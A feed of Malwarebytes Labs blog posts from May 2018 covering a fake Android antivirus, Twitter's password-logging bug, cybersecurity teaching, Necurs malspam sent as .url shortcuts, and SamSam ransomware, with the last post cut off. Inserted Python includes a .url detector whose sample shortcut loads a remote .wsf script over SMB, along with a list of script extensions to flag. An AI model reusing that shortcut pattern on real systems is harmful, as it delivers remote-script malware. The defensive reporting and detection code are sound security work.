Techie Feeds

Mobile Menace Monday: re-emergence of a fake Android AV

Malwarebytes - Mon, 05/07/2018 - 20:46

Back in early 2013, a new mobile antivirus (AV) company called Armor for Android appeared in the mobile security software industry and had everyone perplexed. It seemed eerily like the class of malware known as Fake AV, and some even gave it that label. As a younger mobile researcher, I was one of those who gave it such a label, adding it to a list of malware detections. Shortly after, Armor for Android contacted the security company I worked for at the time and demanded their detection be removed.

As a rebuttal, I wrote a blog to fire back with evidence that there was no way this AV company could be legitimate—despite it being on Google Play. I never published that blog because I was thrown off by something that had me questioning everything: the AV company was tested by a reputable antivirus testing company. Even more off-putting, it landed a high score to receive an official certification! How could a Fake AV be certified by a respectable AV test company?

I left the blog alone and let the subject die. But recently, Armor for Android appears to have made a comeback. Let’s take a look at how they were gaming the system five years ago, and what new tricks they’re up to now.

Cheating the system

Suddenly, after only a couple of months, Armor for Android was competing with everyone else in the industry. But how? Simple. They were cheating. I remember vividly that the naming conventions they used to detect malware were the same as those of other well-received anti-malware mobile scanners. To be fair, many in the industry use similar naming conventions. However, the ones used by Armor for Android were EXACTLY the same as other companies’. It was obvious they were stealing other companies’ detections. But how?

Share, but don’t steal

VirusTotal is a company that everyone in the software security industry uses to share detections with the world. You can simply upload a file, even an Android APK, and several antivirus/anti-malware scanners will return results. This can aid the typical user in finding out whether a file is malicious. In addition, it helps point security researchers in the right direction in determining for themselves whether something is malicious. What isn’t allowed is stealing directly from VirusTotal to produce your own results. Not only is this against the terms of service, it is a deadly sin among everyone in the security industry.

But that is exactly what Armor for Android does. By running Armor for Android under a network analyzer tool, you can see traffic to and from VirusTotal. The detailed data reveals that they indeed steal the detections of others. Pretty easy to do well on a test when you’re peeking over the shoulder of the smartest kids in class!

Showing their real intentions

Armor for Android could have stopped there. They had already duped Google Play. In addition, they clearly had the money to pay for an expensive test to receive certification. Instead, they decided to proceed with tactics used by other Fake AV malware. The following evidence is what I found years ago, but regrettably never published.

Back in 2013, I was playing a free game downloaded from Google Play. In exchange for the app being free, I agreed to receive non-aggressive ads, as many of us do. What I saw was a series of different links using scare tactics:


As a young mobile researcher, I did what all of us would have done and clicked on these links to see which rabbit holes they would take me down. The first hop was this one:

Onward down the rabbit hole, I clicked Download & Scan FREE Now, and it started to download a file named Scan-For-Viruses-Now.apk (more on this app in a bit).

After the download, I landed on a known Armor for Android web page that instructs you to allow unknown sources and again to download and install an app.

Very odd for a legitimate AV company to instruct mobile users to download directly from their website rather than pointing them to Google Play.

Double chance of infection

Further analyzing the downloaded app, Scan-For-Viruses-Now.apk, it’s a version of Armor for Android that insists on a payment of $1.99 to scan the device. Check the fine print, because that ends up being $1.99 per week, or $103.48 a year. But hey, they have a certification from an AV testing firm, right?


It appears Scan-For-Viruses-Now.apk is downloaded as a backup, in case you weren’t falling for the last web page asking you to allow unknown sources and stating “IMPORTANT! You must now INSTALL, OPEN and ACTIVATE.” Also, if allowing unknown sources was disabled on your device, it would have been a last-chance effort, since Scan-For-Viruses-Now.apk wouldn’t have been able to download and install. In my opinion, none of this looks like the practices of a legitimate AV company.

Re-emergence of a classic

Just a couple of days ago, an APK came into our mobile intelligence system with a different name, but a very familiar set of behaviors. It was clearly a repackaged variant of Armor for Android, this time called Android’s Antivirus.


Swiftly, we added a detection called PUP.Riskware.Armor.

Warning about Fake AVs

Fake AVs like the one described above have been around for a long time and come in many different forms. Some can be extremely dangerous. For legitimate antivirus/anti-malware programs to do their jobs, special permissions must be granted. For instance, Malwarebytes for Android uses device administration rights, which are required to remediate nasty ransomware. As a respectable anti-malware company, you have our word that we will never use device administration rights for erasing mobile devices or other nefarious actions. However, give those same rights to a malicious Fake AV app, and you could be in trouble.

Fake AV or legitimate

Because of the elevated permissions needed, consumers need to take extra caution when choosing a mobile antivirus/anti-malware scanner. Unfortunately, it’s often hard to tell what is a Fake AV versus a legitimate antivirus/anti-malware mobile app—especially when Fake AVs creep into Google Play and take time to create a convincing website. As a consumer, do your research to pick respectable software companies. Does the company have a deep, respectable blog (like this one)? How long have they been around? When in doubt, you can always rely on Malwarebytes products to keep you safe from the latest threats!

Denial of entry

Although I never published that blog way back when, I did stand my ground to classify Armor for Android as a fake AV. Now, as a researcher at Malwarebytes, I continue to fight against shady fake AV companies in the mobile space. I helped detect Armor for Android as a fake Android AV years ago. I’ll do the same for any other company looking to take advantage of mobile customers. Stay safe out there!

The post Mobile Menace Monday: re-emergence of a fake Android AV appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in security (April 30 – May 6)

Malwarebytes - Mon, 05/07/2018 - 17:18

Last week on Labs, we examined the Spartacus ransomware, reported about a new tactic used by the Necurs malspam campaign, informed you about the recommended Twitter password change, and discussed engaging students to start considering careers in cybersecurity.

Other news
  • NTLM credentials can be stolen via malicious Portable Document Format (PDF) files without any user interaction. (Source: SecurityWeek)
  • Twitter sold data access to a Cambridge Analytica-linked researcher. (Source: Bloomberg)
  • FacexWorm targets cryptocurrency users by spreading through Facebook Messenger. (Source: Security Affairs)
  • New DNS encryption tools accelerate privacy online. (Source: HelpNetSecurity)
  • IoT security: Is cryptocurrency-mining malware your next big headache? (Source: ZDNet)
  • Companies from across the tech spectrum are lining up to protest the measure that would allow them to “hack back” with offensive initiatives in the face of a cyberattack. (Source: ThreatPost)
  • Drive-by Rowhammer attack uses GPU to compromise Android phone. (Source: ArsTechnica)
  • The systems that control water and power plants are shockingly vulnerable to hackers. (Source: Gizmodo)
  • Facebook’s dating service is a chance to meet the catfisher, advertiser, or scammer of your dreams. (Source: Washington Post)
  • Roskomnadzor, Russia’s telecommunications watchdog, blocks 50 VPNs and Proxy Services providing access to Telegram. (Source: BleepingComputer)
  • Cat burglar: Kitty cryptominer targets web application servers, then spreads to app users. (Source: SCMagazine)

Stay safe, everyone!

The post Week in security (April 30 – May 6) appeared first on Malwarebytes Labs.


Twitter security snafu: change your passwords

Malwarebytes - Fri, 05/04/2018 - 19:18

If you’re logging into Twitter after having been AWOL for a day or two, you’ll likely be seeing one of these pop-ups talking about account security:


Don’t panic, it’s nothing that can’t be fixed.

The message reads as follows:

Keeping your account secure

When you set a password for your Twitter account, we use technology that masks it so no one at the company can see it. We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone. Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password

This text is taken from a post on the official Twitter blog, where they explain what happened (admittedly, without a great deal of additional information), and what you should do to ward off account compromise.

One slight issue I have with the notification wording is that they “ask” users to “consider” changing passwords. It feels like they should have been a lot more forceful here, or just automatically scrubbed all existing logins, making everyone update their passwords by default. Regardless of messaging, the moment a password is exposed—no matter in what capacity, internally or externally—you owe it to yourself to go change it before things become problematic.
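The bug Twitter describes, a password written in the clear to an internal log, is exactly the kind of thing a log-scrubbing filter catches before the record is written. The following is an added example, not Twitter’s or GitHub’s code: a Python `logging.Filter` that redacts password-like values from both the rendered message and any structured fields passed via `extra=`. The field-name list and the sample log calls are assumptions made for illustration.

```python
"""Redact credentials before a log record reaches any handler.

Added example; not Twitter's or GitHub's code. SENSITIVE_KEYS is an assumed
list, and the sample log calls in capture_record() are constructed.
"""
import logging
import re
from typing import Any, Dict, Optional, Tuple

SENSITIVE_KEYS = {"password", "passwd", "pwd", "new_password", "secret", "token"}
REDACTED = "[REDACTED]"

# Matches key=value, key: value and "key": "value" in free text, query strings
# and JSON-ish payloads; group 1 keeps the key and delimiter, group 2 is the value.
_TEXT_PATTERN = re.compile(
    r"(?i)(\b(?:" + "|".join(map(re.escape, sorted(SENSITIVE_KEYS)))
    + r")\b\s*[\"']?\s*[=:]\s*[\"']?)([^&\s\"',}]+)"
)


def redact_text(text: str) -> str:
    """Replace the value that follows any sensitive key in free text."""
    return _TEXT_PATTERN.sub(lambda m: m.group(1) + REDACTED, text)


def redact_mapping(data: Dict[str, Any]) -> Dict[str, Any]:
    """Return a copy of a (possibly nested) dict with sensitive values masked."""
    out: Dict[str, Any] = {}
    for key, value in data.items():
        if key.lower() in SENSITIVE_KEYS:
            out[key] = REDACTED
        elif isinstance(value, dict):
            out[key] = redact_mapping(value)
        elif isinstance(value, str):
            out[key] = redact_text(value)
        else:
            out[key] = value
    return out


class CredentialRedactingFilter(logging.Filter):
    """Scrub the message and any extra= fields of every record it sees."""

    def filter(self, record: logging.LogRecord) -> bool:
        # Render %-style args now so their values are scrubbed too, then drop them.
        record.msg = redact_text(record.getMessage())
        record.args = ()
        # Fields attached with logger.debug(..., extra={...}) land on the record.
        for name, value in list(record.__dict__.items()):
            if name in ("msg", "args"):
                continue
            if name.lower() in SENSITIVE_KEYS:
                setattr(record, name, REDACTED)
            elif isinstance(value, dict):
                setattr(record, name, redact_mapping(value))
        return True


class _CollectingHandler(logging.Handler):
    """Keeps records in memory so the scrubbed result can be inspected."""

    def __init__(self) -> None:
        super().__init__()
        self.records = []

    def emit(self, record: logging.LogRecord) -> None:
        self.records.append(record)


def capture_record(msg: str, args: Tuple[Any, ...] = (),
                   extra: Optional[Dict[str, Any]] = None) -> logging.LogRecord:
    """Log one message through the filter and return the scrubbed record."""
    logger = logging.getLogger("auth-example")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    handler = _CollectingHandler()
    handler.addFilter(CredentialRedactingFilter())
    logger.addHandler(handler)
    logger.debug(msg, *args, extra=extra or {})
    return handler.records[0]


if __name__ == "__main__":
    # Constructed examples of the kind of statement behind the incident above.
    rec = capture_record("login user=%s password=%s", ("alice", "hunter2"))
    print(rec.getMessage())  # login user=alice password=[REDACTED]
    rec = capture_record("auth request", extra={"payload": {"user": "bob", "password": "s3cret"}})
    print(rec.payload)       # {'user': 'bob', 'password': '[REDACTED]'}
```

Attach the filter to the handler rather than the logger so records propagated from child loggers are scrubbed too.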

A big issue with passwords being exposed in this kind of scenario is the combination of password reuse and a lack of two-factor authentication. Not everyone makes use of 2FA, and that becomes a real threat when people reuse the same login across multiple, unrelated accounts. Thankfully, Twitter has addressed this, giving users the necessary information to do something about it.

From the blog:

  1. Change your password on Twitter and on any other service where you may have used the same password.

  2. Use a strong password that you don’t reuse on other websites.

  3. Enable login verification, also known as two factor authentication. This is the single best action you can take to increase your account security.

  4. Use a password manager to make sure you’re using strong, unique passwords everywhere.

Interestingly, it appears GitHub recently ran into a similar issue with internally exposed passwords (though it doesn’t seem to be on the same scale as Twitter’s snafu):

Hi @briankrebs I got a similar email from GitHub. I don’t know whether this is as large in scale as that of Twitter.

— deegovee (@deegovee) May 4, 2018

As some Twitter users have suggested, it’s possible someone at Twitter read about the GitHub incident, checked their own logs, and then said “Oh no” a lot. However this all came about, and keeping in mind how information available to social network employees can potentially be abused, we should be mindful that despite our best efforts as a user of a service, ultimately something can go wrong that’s entirely out of our hands. In the Twitter and GitHub cases, we strongly advise keeping passwords unique and making use of 2FA to avoid losing control of important accounts.

If you want to know more about password managers, why you might want to use them, and what ones are out there, you should check out our blog on that very subject. Just keep in mind that sometimes incidents do happen, and that password managers can also be good targets for scammers. Weigh up the pros and cons, and make the decision best suited for you personally.

If you’d like to find out about two factor authentication, then our piece on 2FA basics will likely be just what you need. We even have some advice for what to do if you need to go on holiday and 2FA by SMS codes won’t be available.

Finally, if you spend a lot of time on mobile Twitter, then you may wish to think about securing your mobile device, too. All the fancy passwords in the world alongside a slice of 2FA won’t help much if someone retrieves your lost phone from a ditch and starts spamming an inventive collection of swear words and pornography links to your colleagues.

To summarize, then: log in as soon as possible, change your password (and enable 2FA), take a look at your security settings, examine your third-party applications, and keep on Tweeting. Your social media vertical can go about its business. Hooray!

The post Twitter security snafu: change your passwords appeared first on Malwarebytes Labs.


Engaging students in cybersecurity: a primer for educators

Malwarebytes - Fri, 05/04/2018 - 16:52

Give a man a fish and you feed him for a day;
teach a man to fish and you feed him for a lifetime.
~ Maimonides

The education sector has had its share of breaches. And schools, like medical and retail institutions, continue to struggle when it comes to securing their highly prized assets: student and staff data and intellectual property. This is a big challenge for many. Unfortunately, it’s not the only challenge they face.

The education sector is pressured to address skills shortage, not just within the cybersecurity industry but in their own as well. Educators are also faced with the challenge of teaching the current and future generation of students about cybersecurity and privacy, fields which for most of them are relatively new and challenging to learn. Furthermore, engaging students to start considering careers in cybersecurity—much less getting them interested and talking about it—is another hurdle to conquer.

Educators are left wondering, “How can I even begin to tackle all this?” Before we start concerning ourselves with what to do with students, here are two questions teachers must ask themselves first:

How prepared am I for this?

Remember that a mark of good teaching is knowledge of, a firm grasp of, and familiarity with the subject matter. Teachers both new and experienced who are willing to take up teaching cybersecurity can start off by learning more about this subject for themselves, understanding why it’s crucial that every citizen of every country plays their part, and how they can make a difference in the burgeoning fight against cybercrime. There are several ways this can be done:

  • Get trained. The National Initiative for Cybersecurity Careers and Studies (NICCS), an online resource and training hub managed by the Department of Homeland Security, offers cybersecurity training for educators for free. They can check out the materials from the NICCS official website.
  • Seek mentors among experienced cybersecurity educators and/or professionals. It’s always good to have someone show you the ropes on something you’re not that familiar with yet. The same is true for educators, and there’s no shame in asking to be mentored. After all, educators can benefit from the best and brightest minds in this field, as do the students.
  • Teach yourself via the Internet. Self-learning is always an option, and there are free and available materials an educator can use for studying online. Cybersecurity Ventures also has a hefty list of private institutions that educators and their organizations can invite to do in-house training. Lastly, the National Initiative for Cybersecurity Education (NICE), which is a program of the National Institute of Standards and Technology in the Department of Commerce, has more materials teachers can pore over.

What methods can I use to introduce this new subject to my students?

Making cybersecurity palatable to K–12 students is something educators must prepare and plan ahead for. For some organizations, the availability of technology has made it easier for teachers to use methods beyond the blackboard and textbooks.

This doesn’t mean that old yet effective methods of instruction are entirely forgotten. Instead, technology must be integrated alongside tools that already work in a classroom. Technology also livens up the class, making it conducive for students to accept the new subject matter. TeachHub recommends that teachers who decide to take advantage of new technology-based learning tools undergo the four stages of technology integration: substitution, augmentation, modification, and redefinition. And when it comes to training students on cybersecurity, it’s a must.

We can’t give what we don’t have. In this case, educators cannot impart knowledge about cybersecurity without having gained (or being in the process of gaining) sufficient knowledge of it themselves. So it’s essential to complete this step before moving on to the next.

Ways to get students interested and involved in cybersecurity

The majority of educators love teaching because they also like working with young kids. And starting them young is the ideal stage to discuss cybersecurity. How young? Some say once they begin elementary school; for others, there is really no defined age. As long as the kids (1) are mature enough mentally to be taught about the importance of safe computing, and (2) are already using technology, such as a smartphone or tablet, then we can say they are ready to take this new step to learning.

Like any list, the outline below isn’t exhaustive. It is also by no means an ordered list of steps, but rather a list of guidelines you can follow (or reject) at your discretion. As educators, you can branch out and look for other ways. Keep honing your methods and replacing them with new, more efficient ones. So without further ado, below are the methods we’re proposing for kids:

1. Join boot camps. Independent and private organizations can conduct cybersecurity camps for kids and teens. It’s up to the educator to learn more about such programs, getting as much information as they can, and then choosing which camp they’d vouch for their students to join. Examples of camps are GenCyber, Cyber Camps by the US Cyber Challenge, and Tech Camps by ID Tech.

2. Join competitions. This probably applies to middle-school through university-level contests, which can be in-school or out-of-school. Examples are Carnegie Mellon’s picoCTF, CyberFirst Girls Competition (in the UK), CyberPatriot, and Global Cyberlympics.

3. Go on tours. Some schools can organize trips within government and private sector offices that deal with cybersecurity.

4. Get an internship. Students at the high school level (as young as) can apply for an internship at companies that have openings on their information security teams. An internship is the closest hands-on experience they can gain in a real-world setting. Educators can encourage their students to go for this, or go that extra mile and vouch for the students to the companies they want to intern with.

5. Volunteer to teach younger generations about cybersecurity. This may apply to high school and university-level students who would be graduating. Not only would this help educators immensely by being unburdened from some of the tasks of teaching, but it can also be a positive experience for students while putting themselves in the shoes of being a mentor. Who knows—they might actually take an interest in teaching cybersecurity for the next generation.

And as for teachers, they can help students by doing the following:

1. Provide them with a role model. Kids and teens need someone they can look up to or model themselves after, even when they don’t realize it at first; this could explain why YouTube stars are so famous. If you want to encourage kids and teens to become experts in the field of their interest in the future, educators must introduce them to personalities they can emulate. Are the little girls in class fans of Taylor Swift? Mention that Swifty is actually besties with Karlie Kloss, international supermodel and coder.

2. Develop their soft skills. While tech and coding skills may be necessary for several job positions, soft skills—especially when sharpened to the point of awesomeness—can not only get the post-grad through the door but can also keep them employed for a long time.

In a previous blog post, we asserted that if one wants to work in cybersecurity, they don’t have to be too technical or know how to code. In fact, some are saying that the skills shortage being experienced in this industry is not about lacking technical people. Instead, the industry requires technical people who also have other skills like advanced reading, advanced writing, communication, management, organization, critical thinking, and troubleshooting skills. Most employers actually consider soft skills as more important than hard skills.

Read: When cybersecurity isn’t all cyber: What does it really take to work in cybersecurity?

3. Recognize talents that they can use in cybersecurity. Some students may feel put off or inadequate in pursuing careers that they deem too technical. Musical individuals and those with above-average hand-eye coordination (e.g., video game players), they say, may have a high chance of success in the cybersecurity field. They are creative personalities who can think outside the box when it comes to solving problems and innovating, especially when they are adequately trained. Educators can use the studies behind these claims to pique student interest for a start.

4. Provide a platform for students to learn, share, and apply what they learned. In this day and age, it may not be difficult to find a platform. We have already mentioned YouTube above. There is also GitHub for the code monkeys, and, if your child is into messaging instead of social networking sites to get in touch with their friends, there is Discord, where they can create a room and throw ideas around to members who can help refine them. There is also Twitch, where some game modders actually broadcast themselves coding and testing the code of the game they want to improve on.

5. Gamify learning. Gamification, the use of game mechanics and design to drive home important points that may otherwise leave students confused, can bring about high engagement. Not to mention, it’s extremely fun. There are several ways educators can apply this. They can change the class grading system from letter grades to “experience points” (or XP in the gaming world), as one teacher has already demonstrated, award students tangible incentives like badges, conduct tournaments among small groups within the class, and use actual games that teach about cybersecurity, privacy, and hacking. For middle- to high-school educators, assess whether you can introduce your students to games like TIS-100, Shenzhen I/O, and Uplink. Zachtronics has more and varied games to offer on their website.

6. Teach them the necessary security skills. One cannot be equipped to work in cybersecurity—or, in this day and age, in any industry—until they know basic cybersecurity hygiene. This is fundamental, but it shouldn’t stop there. Students will learn and adapt better security techniques to protecting their own and company assets once they advance in their education and begin working. But having some sort of security cornerstone or foundation must be there to build on.

7. Ingrain in them the importance of continuous development. Education shouldn’t begin and end in institutions. This may seem like a no-brainer, but it is important to remind students that although learning on the job is essential, it is equally important to make an effort to understand concepts they haven’t encountered in the classroom by reading books and researching about them online. Life these days is fast-paced, and if one is not paying attention, valuable knowledge can just pass us by.

8. Expand cybersecurity education and training efforts to include all students. This may be applicable only in a university setting. Expanding cybersecurity education means that it shouldn’t be only students in STEM courses being trained on it. The curriculum should include practical applications of security in their career of choice and how insecure practices may potentially jeopardize not just their employment but also the clients they serve. Real-world scenarios and examples are the best case studies.

The cool factor

While educators expose students to the exciting and highly positive aspects of cybersecurity, it’s unavoidable for them to also see the other side of it: the exploits, methodologies, and (if the information is available) the people behind cybercrimes and threat actor groups that the cybersecurity industry is battling against.

Thanks to increased media coverage of successful breaches, the availability of written works and videos on various hacktivist ideologies, and the dramatization of the misuse of computer and network prowess in television series and movies, students have more to internalize and mentally process today compared to previous generations. Unfortunately, in today’s culture, more and more are not taking the time to think things through before acting. In many instances, kids and teens like to do things because of “the cool factor” involved.

This isn’t entirely a bad thing. The dramatization of hacking in TV and movies, no matter how poorly it is presented, has inadvertently put cybersecurity on the media map, undoubtedly sparking viewers’ imaginations, helping form ideals and dreams, and pushing intellectuals and creatives alike to pursue the “what ifs.”

So if you hear students expressing sympathy over Elliot Alderson’s plight in taking down an evil corporation that he works for, a liking to Penelope Garcia’s focus and quick wit in the midst of life-or-death situations, or a deep fascination for Harold Finch’s selflessness and fierce loyalty to the cause of saving and not taking lives, let them. But also bring them gently back down to reality and introduce eye-opening documentaries of real-life hackers and how the cyberculture came about.

CyberRisk named a few titles in a recent blog post, from Hackers in Wonderland (2000) to Hackers are People, Too (2008). Of course, we’d like to add The Triumph of the Nerds: The Rise of Accidental Empires (1996), Downloaded (2013), The Internet’s Own Boy: The Story of Aaron Swartz (2014), Deep Web (2015), and Softwaring Hard (2014).

Heck, if these aren’t cool for them, then I don’t know what is.

The post Engaging students in cybersecurity: a primer for educators appeared first on Malwarebytes Labs.


Internet Shortcut used in Necurs malspam campaign

Malwarebytes - Thu, 05/03/2018 - 17:44

The Necurs botnet continues to be one of the most prolific malicious spam distributors, with regular waves of carefully crafted attachments that are used to download malware.

The majority of malspam campaigns that we track target Microsoft Office with documents containing either macros or exploits. We also see a number of other types of malicious attachments that are zipped scripts (.VBS, .JS, etc.)—essentially downloaders for the final payload.

In a new technique recently uncovered, Necurs is changing things up a little bit by avoiding the aforementioned formats and using a different file type instead, crafting malicious .URL files (Internet Shortcut).

This attack relies on the file:// protocol to load and execute a remote script from a Samba (SMB) share. This is noteworthy because typically the attachment itself is the downloader, but here we see one additional step that pushes that function one degree further thanks to the .url shortcut.

By not placing the malicious script directly within the attachment, attackers are also preventing the automated collection and sandbox analysis that usually takes place within spam traps.
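The shortcut-to-SMB delivery described above can be caught before a user opens the attachment by inspecting the .url file itself. The following is an added example, not Malwarebytes’ detection logic: a small Python checker that parses the INI-style `[InternetShortcut]` section, extracts the `URL=` target and flags targets that resolve to a remote file:// or UNC host, with extra weight for script extensions such as .wsf. The sample shortcut contents and the 192.0.2.10 host are constructed for illustration.

```python
"""Flag Internet Shortcut (.url) attachments that point at a remote SMB share.

Added example for the technique described above; not Malwarebytes' own code.
The sample .url contents below are constructed, and 192.0.2.10 is a
documentation-only (TEST-NET-1) address, not a real indicator.
"""
import configparser
import os
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote, urlparse

# Extensions Windows hands to a script host or loader when the target is opened.
SCRIPT_EXTENSIONS = {".wsf", ".vbs", ".vbe", ".js", ".jse", ".hta",
                     ".cmd", ".bat", ".ps1", ".scr", ".exe", ".lnk"}


@dataclass
class ShortcutVerdict:
    target: str
    remote_host: Optional[str]
    extension: str
    suspicious: bool
    reason: str


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            value = cp[section].get("url")  # option names are lower-cased by configparser
            return value.strip() if value else None
    return None


def remote_host_of(target: str) -> Optional[str]:
    """Server name of a file:// URL or UNC path; None for local or web targets.

    Accepts file://server/share/x, file:////server/share/x (Windows style with
    extra slashes) and \\\\server\\share\\x. Drive letters and localhost are local.
    """
    t = target.strip()
    if t.startswith("\\\\"):
        return t.lstrip("\\").split("\\", 1)[0] or None
    parsed = urlparse(t)
    if parsed.scheme.lower() != "file":
        return None
    if parsed.netloc and parsed.netloc.lower() != "localhost":
        return parsed.netloc
    # file:////server/share -> netloc is empty and the path starts with //server
    m = re.match(r"^/+([^/\\]+)[/\\]", parsed.path)
    if m and not re.fullmatch(r"[A-Za-z]:", m.group(1)):
        return m.group(1)
    return None


def assess_shortcut(text: str) -> ShortcutVerdict:
    """Classify the contents of one .url file."""
    target = parse_internet_shortcut(text)
    if target is None:
        return ShortcutVerdict("", None, "", False, "no [InternetShortcut] URL= entry")
    leaf = unquote(target).replace("\\", "/").rsplit("/", 1)[-1]
    ext = os.path.splitext(leaf)[1].lower()
    host = remote_host_of(target)
    if host is None:
        return ShortcutVerdict(target, None, ext, False, "local or web target")
    if ext in SCRIPT_EXTENSIONS:
        return ShortcutVerdict(target, host, ext, True,
                               f"remote file:// target with executable extension {ext}")
    return ShortcutVerdict(target, host, ext, True, "remote file:// or UNC target")


# Constructed samples: a harmless web shortcut and one mimicking the malspam lure.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/\r\nIconIndex=0\r\n"
MALICIOUS_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://192.0.2.10/share/invoice.wsf\r\n"
    "IconIndex=3\r\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
)

if __name__ == "__main__":
    for name, content in (("web.url", BENIGN_URL_FILE), ("invoice.url", MALICIOUS_URL_FILE)):
        v = assess_shortcut(content)
        print(f"{name}: suspicious={v.suspicious} host={v.remote_host} ({v.reason})")
```

In a mail gateway the same check would run on every .url attachment, and blocking outbound SMB (TCP 445) at the perimeter removes the second hop even when a shortcut slips through.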

An obfuscated view of the WSF script can be seen in the screenshot below:

The final payload is eventually downloaded from a remote server:

This is an interesting attack designed to bypass traditional security measures and administrative policies that may block the well-known Office macros.

Malwarebytes users are already protected against this technique.

Malware authors are constantly looking for new evasion techniques as long as they generate good success rates. Social engineering attacks have relied upon the same lures for some time, but every now and again we see a slight variation in a technique that was perhaps known, but not yet leveraged by criminals.

The post Internet Shortcut used in Necurs malspam campaign appeared first on Malwarebytes Labs.


SamSam ransomware: what you need to know

Malwarebytes - Tue, 05/01/2018 - 15:54

SamSam ransomware is a custom infection used in targeted attacks, often deployed using a wide range of exploits or brute-force tactics. Based on our own run-ins with the infection, we’ve observed that attacks were made on targets via vulnerable JBoss host servers during a previous wave of SamSam attacks in 2016 and 2017.

In 2018, SamSam uses vulnerabilities in remote desktop protocol (RDP), Java-based web servers, or file transfer protocol (FTP) servers to gain access to the victims’ network, or brute-forces weak passwords to obtain an initial foothold. From there, the ransomware “fun and games” begin for the authors. For everyone else, it’s chaos.

The ties that bind

A common thread tying all of these attacks together is the use of the word “sorry” in ransom notes, URLs, and even infected files. It’s made hundreds of thousands of dollars so far, and it’s caused no end of trouble in the US for cities like Atlanta.

Here’s what a typical ransom splash screen looks like:

The ransom note is quite interesting, giving the option of randomly-selected file encryption (if you don’t pay the full amount). They’ll also unlock one file for free as a token of trust that they will give your files back after payment. It reads as follows:

What happened to your files?

All your files encrypted with RSA-2048 encryption, for more information search in Google “RSA encryption”

How to recover files?

RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key.

How to get private key?

You can get your private key in 3 easy steps:
1) You must send us 0.8 Bitcoin for each affected PC or 4.5 Bitcoins to receive all private keys for all affected PCs.
2) After you send us 0.8 Bitcoin, leave a comment on our site with this detail: just write your host name in your comment
3) We will reply to your comment with a decryption software, you should run it on your affected PC and all encrypted files will be recovered

With buying the first key you will find that we are honest

Ransomware authors rely on the victim viewing their odd code of “honesty” as important, or else nobody would dare to pay up.

I should also mention, before we go any further, that we do protect against this specific threat, which we detect as Ransom.Samas:

The SamSam group has been making waves since late 2015, causing trouble in 2016, and starting to regularly increase the cost of their ransom in 2017. Colorado and Atlanta have both had run-ins with SamSam recently, as you may have seen from ongoing news coverage.

One would think SamSam has been around long enough for organizations to be able to deal with it effectively, but it’s still here, and still locking up machines in targeted attacks.

You can trace SamSam’s first 2018 appearance back to January. There’s “persistent” and then there’s SamSam.

January: Sorry, not sorry

Hospitals, city municipalities, and many more from Indiana to New Mexico were all struck down by SamSam in varying degrees of severity. A hospital in Indiana, in particular, was reduced to working with pen and paper in stormy weather. They decided to pay the ransom and get systems back up and running, given the cost of the fix was more than the ransom. This is an organization that had backups in place, unlike many other ransomware victims. All the same, by attacking a service offering life-saving treatment to patients, staff were left with few options.

Though you’ll find conflicting advice on paying the ransom, and while appreciating that every case is different, we generally advise not to do it. By handing over the cash, you’re giving the green light to the hackers to carry on doing it. If it works the first time, why not the second or third?

This is the already fraught situation healthcare professionals and departments responsible for day-to-day management of city services find themselves in as we head into February.

February: Slow traffic blues

In February, the Colorado Department of Transportation had to shut down 2,000 (non critical) systems as they, too, were hit by a SamSam outbreak. Bitcoin was once again what the hackers were after; the CDT decided that they weren’t going to pay up, but restore their backups instead.

March: Atlanta ransomware resurgent

All of the worst problems of SamSam effectively rolled into one large pile of misery for the city of Atlanta, who had a serious case of the SamSam blues:

The City of Atlanta is currently experiencing outages on various customer facing applications, including some that customers may use to pay bills or access court-related information. We will post any updates as we receive them.

— City of Atlanta, GA (@Cityofatlanta) March 22, 2018

They were faced with the prospect of paying $6,800 per machine to unlock the encrypted files, or a cool $51,000 to recover everything across all compromised computers. As to how the attackers got in, one researcher noted a potential EternalBlue route:

C’mon @Cityofatlanta… SMBv1 open on web.atlantaga[.]gov to the internet? Have we learned nothing!? #ransomware #Atlanta

— Reggie (@Ring0x0) March 23, 2018

Regardless of the method used, the big problem here is that 10 days after initial infection, they were still struggling to get back to full strength, with no less than five out of 13 departments hit in the original malware blast. Just like the Indiana hospital staff were forced to use pen and paper, so too were law enforcement in Atlanta—and they also lost some police records in the bargain.

Note that three city council staffers had to work on a “clunky personal laptop.” So now we’re introducing personal machines onto a network dealing with potentially sensitive data, already hammered by opportunistic malware infections. One hopes that the machine had at least been checked for infections or potential vulnerabilities, but it would be surprising if the already busy IT staff checked if the employee had installed all security patches.

You could say the ransom was “only” $51,000—except the ransomware authors pulled the payment page and left Atlanta carrying the can. Ultimately, the SamSam outbreak cost the city of Atlanta a terrifying $2.6 million to set a $50k infection right.

It isn’t just fixing some computers. There’s everything from forensics and insurance to extra staff and crisis comms to consider. This is the very real cost of attempting to recover from an infection—and that’s while trying to offer public-facing services potentially impacted by the attack.

Fighting ransomware

Ransomware may be experiencing a drop in popularity but make no mistake—the impact can be horrendous. As a reminder, here are some ways local governments and other organizations can fend off these attacks:

  • Backups are essential, and help to reduce some of the impact from a ransomware attack. A word of caution: your backups have to be logical and easy to implement if needed. All too often, organizations throw everything into a jumble of files and folders, with duplication galore and no real instructions as to where everything should go.
  • Staff training. It’s arguable that the automated systems in place should stop attacks long before reaching the human component of your network, but giving staff a crash course in security basics is always a good idea.
  • Spam filtering for email-based attacks (fake PDF invoices, booby-trapped Word documents insisting you enable Macros and the like).
  • Disable unnecessary exposed services facing the Internet, a time-honored way in for ransomware infections everywhere.
  • Change default/easy-to-guess passwords on all of your systems and services (not just the “important” ones, because ultimately someone will find their way in on the supposedly unimportant ones instead).
  • Choose your vendors wisely.

SamSam: not gone, and not forgotten

